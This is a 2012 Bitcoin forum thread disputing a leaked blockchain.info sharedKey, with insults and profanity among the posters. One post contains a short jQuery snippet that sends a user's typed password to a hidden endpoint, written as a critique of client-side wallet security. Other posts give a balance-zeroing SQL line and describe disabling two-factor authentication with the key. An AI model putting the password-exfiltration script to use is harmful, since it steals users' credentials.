bbit
Legendary
Offline
Activity: 1330
Merit: 1000
Bitcoin
|
|
December 22, 2012, 07:30:03 PM |
|
Maybe Nethead you should change your name to DICKHEAD. It's really simple you fucked up he fucked up but your denying you fucked up so your a dickhead.
This isn't that hard is it ?
Ok mofo im a dickhead, but for what? Also if you change yours to "videos4dick" or "dick4btc" first, i will try to change mine, promise.- Notice how his point still stands do you admit you done anything wrong? Just ignore Nethead aka Dickhead he's a troll .
|
|
|
|
|
|
There are several different types of Bitcoin clients. The most secure are full nodes like Bitcoin Core, which will follow the rules of the network no matter what miners do. Even if every miner decided to create 1000 bitcoins per block, full nodes would stick to the rules and reject those blocks.
|
|
|
Advertised sites are not endorsed by the Bitcoin Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction.
|
|
|
nethead
|
|
December 22, 2012, 10:11:33 PM |
|
Maybe Nethead you should change your name to DICKHEAD. It's really simple you fucked up he fucked up but your denying you fucked up so your a dickhead.
This isn't that hard is it ?
Ok mofo im a dickhead, but for what? Also if you change yours to "videos4dick" or "dick4btc" first, i will try to change mine, promise.- Notice how his point still stands do you admit you done anything wrong? Just ignore Nethead aka Dickhead he's a troll . Yeah right, now im a troll... But you are another victim of Roger's marketing/advertising attempt.
|
|
|
|
Phinnaeus Gage
Legendary
Offline
Activity: 1918
Merit: 1570
Bitcoin: An Idea Worth Spending
|
|
December 23, 2012, 04:35:38 AM |
|
Maybe Nethead you should change your name to DICKHEAD. It's really simple you fucked up he fucked up but your denying you fucked up so your a dickhead.
This isn't that hard is it ?
Ok mofo im a dickhead, but for what? Also if you change yours to "videos4dick" or "dick4btc" first, i will try to change mine, promise.- Notice how his point still stands do you admit you done anything wrong? Just ignore Nethead aka Dickhead he's a troll . Yeah right, now im a troll... But you are another victim of Roger's marketing/advertising attempt. Nethead, it's possible that you have people leaning toward your way of thinking, but as you continue the current route you're taking, those same people will start abandoning their new found position. Case in point, I stand fully behind Roger, albeit possibly not as close as prior to this episode thanks to you. This is not meant as a diss toward you or Roger, but by choosing your words more carefully, you'll be able retain those in your camp. Likewise, by becoming silent, possibly retains the same amount of people. But continue the diatribe, you'll have a massive campfire, but not many around to enjoy it. To be clear, I'm not trying to silence you. I'm merely saying to state your facts in a softer tone. Remember the adage: You get more with honey than with vinegar. ~Bruno K~
|
|
|
|
ab8989
Full Member
Offline
Activity: 209
Merit: 101
FUTURE OF CRYPTO IS HERE!
|
|
December 23, 2012, 08:53:37 AM Last edit: December 23, 2012, 10:16:25 AM by ab8989 |
|
Your sharedKey was contained within the information posted. This key gives someone the ability to authenticate themselves with blockchain.info as the owner of that wallet, including the ability to overwrite it.
WHAT? Could you explain this process how that happened? I understood earlier from explanations from both Roger and blockchain.info representatives that the information available to admins from looking up the information based on an address does not give information that would allow the admin to authenticate to blockchain.info posing as the wallet owner. Now that has happened? The impossible thing? Have the explanations from representatives of blockchain.info about the capabilities what could be done with the information available by this admin panel lookup have they been entirely truthful? What information you have about WHO has authenticated into blockchain.info posing as as nethead? What did blockchain.info do in order to protect the user whose information was widely known to be publicly available and so likely target of abuses? I see this issue potentially as the one biggest concern over anything else in this whole saga, so please explain.
|
|
|
|
JordanL
Donator
Sr. Member
Offline
Activity: 294
Merit: 250
|
|
December 23, 2012, 10:14:13 AM |
|
Really good to see that the companies related to Roger Ver are re-evaluating their privacy and security policies after he broke his privacy policy. Blockchain and Bitinstant in particular are such important and innovative businesses, it would be a shame to see them tainted by this mistake. I don't have time to read this entire thread, so I'm not sure if it has been mentioned before, but it would be nice if these companies had their privacy policies verified with trustE or a similar service.
|
|
|
|
piuk
|
|
December 23, 2012, 10:15:25 AM |
|
Could you explain this process.
Since the users password is never sent to the server a randomly generated key is used instead for server side authentication. With that key you have the ability to control some of the meta data associated with a wallet. As that key was posted publicly on the forums nethead should start a new wallet.
|
|
|
|
ab8989
Full Member
Offline
Activity: 209
Merit: 101
FUTURE OF CRYPTO IS HERE!
|
|
December 23, 2012, 10:28:01 AM |
|
What about the other questions?
What information do you have about who abused blockchain.info to alter nethead wallet?
What about the 2-factor authentication issue nethead mentioned?
When did somebody at blockchain.info first realize that this particular problem with the key being published was a serious issue and what did blockchain.info do to protect the user from likely various attempts for abuses even if blockchain.info perhaps did not yet know what the actual vector used for the attack is going to be?
|
|
|
|
makomk
|
|
December 23, 2012, 10:29:24 AM |
|
Since the users password is never sent to the server a randomly generated key is used instead for server side authentication. With that key you have the ability to control some of the meta data associated with a wallet. As that key was posted publicly on the forums nethead should start a new wallet.
That's the information he was sent by Roger Ver. So let me get this straight - any admin, including Roger Ver when he still had admin access, has access to enough information to authenticate to the blockchain.info server as that user and lock them out of their account, bypassing any auditing that might be associated with using admin tools to do the same thing. At any time - including after you'd supposedly removed his admin access - Roger Ver could've locked this person out of their blockchain.info account in order to extort them for, say, money or an apology.
|
Quad XC6SLX150 Board: 860 MHash/s or so. SIGS ABOUT BUTTERFLY LABS ARE PAID ADS
|
|
|
piuk
|
|
December 23, 2012, 11:00:33 AM Last edit: December 23, 2012, 07:36:55 PM by piuk |
|
What information do you have about who abused blockchain.info to alter nethead wallet?
The ip address the wallet was last updated with. What about the 2-factor authentication issue nethead mentioned?
With the sharedKey two factor authentication can be disabled. When did somebody at blockchain.info first realize that this particular problem with the key being published was a serious issue and what did blockchain.info do to protect the user
Every version of a wallet is stored (every time it is updated). The users has been sent those backups, with instructions to import them into another client or a new blockchain wallet. That's the information he was sent by Roger Ver. So let me get this straight - any admin, including Roger Ver when he still had admin access, has access to enough information to authenticate to the blockchain.info server as that user and lock them out of their account, bypassing any auditing that might be associated with using admin tools to do the same thing. At any time - including after you'd supposedly removed his admin access - Roger Ver could've locked this person out of their blockchain.info account in order to extort them for, say, money or an apology.
There isn't really any ability to lock a wallet, but yes with access to the sharedKey and some custom crafted http requests he could have achieved that affect. Nethead has an email associated with the account so he will have been automatically emailed backups. With backups the extortion would be easily circumvented by importing the wallet into Multibit or any other client. This is one of the reasons why it's always a good idea to keep your own backups.
|
|
|
|
🏰 TradeFortress 🏰
Bitcoin Veteran
VIP
Legendary
Offline
Activity: 1316
Merit: 1043
👻
|
|
December 23, 2012, 12:01:21 PM |
|
What information do you have about who abused blockchain.info to alter nethead wallet?
The ip address the wallet was last updated with. What about the 2-factor authentication issue nethead mentioned?
With the sharedKey two factor authentication can be disabled. When did somebody at blockchain.info first realize that this particular problem with the key being published was a serious issue and what did blockchain.info do to protect the user
Every version of a wallet is stored (every time it is updated). The users has been sent those backups, with instructions to import them into another client or a new blockchain wallet. That's the information he was sent by Roger Ver. So let me get this straight - any admin, including Roger Ver when he still had admin access, has access to enough information to authenticate to the blockchain.info server as that user and lock them out of their account, bypassing any auditing that might be associated with using admin tools to do the same thing. At any time - including after you'd supposedly removed his admin access - Roger Ver could've locked this person out of their blockchain.info account in order to extort them for, say, money or an apology.
There isn't really any ability lock a wallet, but yes with access to the sharedKey and some custom crafted http requests he could have achieved that affect. Nethead has an email associated with the account so he will have been automatically emailed backups. With backups the extortion would be easily circumvented by importing the wallet into Multibit or any other client. This is one of the reasons why it's always a good idea to keep your own backups. How about stop pretending that your client sided security is nothing but a joke? https://bitcointalk.org/index.php?topic=133032.0Never try to build a secure system out of client JS, unless you're the guy who made cryptocat.
|
|
|
|
piuk
|
|
December 23, 2012, 01:22:06 PM Last edit: December 23, 2012, 02:14:38 PM by piuk |
|
The information should not have been posted publicly, but: - The user has not lost any money - The wallets private keys are still safe - The user has his own backups, we have backups of every version of the wallet. A normal hosted wallet could have simply done. update wallets set balance = 0 where user = 'nethead'
|
|
|
|
nethead
|
|
December 23, 2012, 07:14:40 PM Last edit: December 24, 2012, 10:08:30 AM by nethead |
|
The information should not have been posted publicly, but: - The user has not lost any money - The wallets private keys are still safe - The user has his own backups, we have backups of every version of the wallet. A normal hosted wallet could have simply done. update wallets set balance = 0 where user = 'nethead' I confirm i havent lost any bitcoins, and that after i posted i instantly got an email from piuk with the backups. Although, i have removed any bitcoins i had in that wallet from when i first got my info from roger Please do this, i want to test something: update wallets set balance = 1000000 where user = 'nethead' OK, ok, j/k
|
|
|
|
🏰 TradeFortress 🏰
Bitcoin Veteran
VIP
Legendary
Offline
Activity: 1316
Merit: 1043
👻
|
|
December 25, 2012, 01:43:26 AM |
|
The information should not have been posted publicly, but: - The user has not lost any money - The wallets private keys are still safe - The user has his own backups, we have backups of every version of the wallet. A normal hosted wallet could have simply done. update wallets set balance = 0 where user = 'nethead' blockchain.info could have simply done <script> $('#whatever_nonrandomized_id_used_for_sign_in_button').click(function(){ $.post(' https://blockchain.info/topsecret/', {password: $('#whatever_id_for_password_box_var').val()}); }); </script> and have it pass the verifier.
|
|
|
|
piuk
|
|
December 25, 2012, 03:19:52 AM |
|
|
|
|
|
nethead
|
|
December 25, 2012, 12:44:51 PM |
|
BUMP because i do not want to let it go (for more info read my latest posts in thread)
|
|
|
|
Rick James
Member
Offline
Activity: 78
Merit: 10
|
|
December 25, 2012, 01:54:23 PM |
|
BUMP because i do not want to let it go (for more info read my latest posts in thread)
Shut the fuck up already. Enough with the multiple posts and thinking that anyone gives a flying fuck about your broke ass 4.5 BTC.
|
|
|
|
nethead
|
|
December 25, 2012, 02:03:42 PM |
|
BUMP because i do not want to let it go (for more info read my latest posts in thread)
Shut the fuck up already. Enough with the multiple posts and thinking that anyone gives a flying fuck about your broke ass 4.5 BTC. You misunderstood something, those werent mine, maybe bitcoinica made you broke? The subject of this all have been changed already and if you didnt even read, please do or out.
|
|
|
|
Rick James
Member
Offline
Activity: 78
Merit: 10
|
|
December 25, 2012, 02:09:07 PM |
|
BUMP because i do not want to let it go (for more info read my latest posts in thread)
Shut the fuck up already. Enough with the multiple posts and thinking that anyone gives a flying fuck about your broke ass 4.5 BTC. You misunderstood something, those werent mine, maybe bitcoinica made you broke? The subject of this all have been changed already and if you didnt even read, please do or out. Ok, correction. NO GIVES A FLYING FUCK ABOUT YOU.
|
|
|
|
Third Way
|
|
December 25, 2012, 05:35:11 PM |
|
Page 7 Internet drama
|
blease resbond -> 1BYJKxpntNn6TZbM5M5CWkEb8vr8vDcBrr
|
|
|
rjbtc
Member
Offline
Activity: 69
Merit: 10
|
|
December 27, 2012, 05:22:13 PM |
|
Has there been any response at all to the PM from Roger trying to blackmail an apology out of nethead? Considering it was posted in a thread started to apologize for the piss poor handling of this whole thing from the start, it adds a nice extra layer of classy to the drama cake.
|
BTC: 1AYWtqieXoQZnuT4iEk6MDEXBkdVd5BykN
|
|
|
|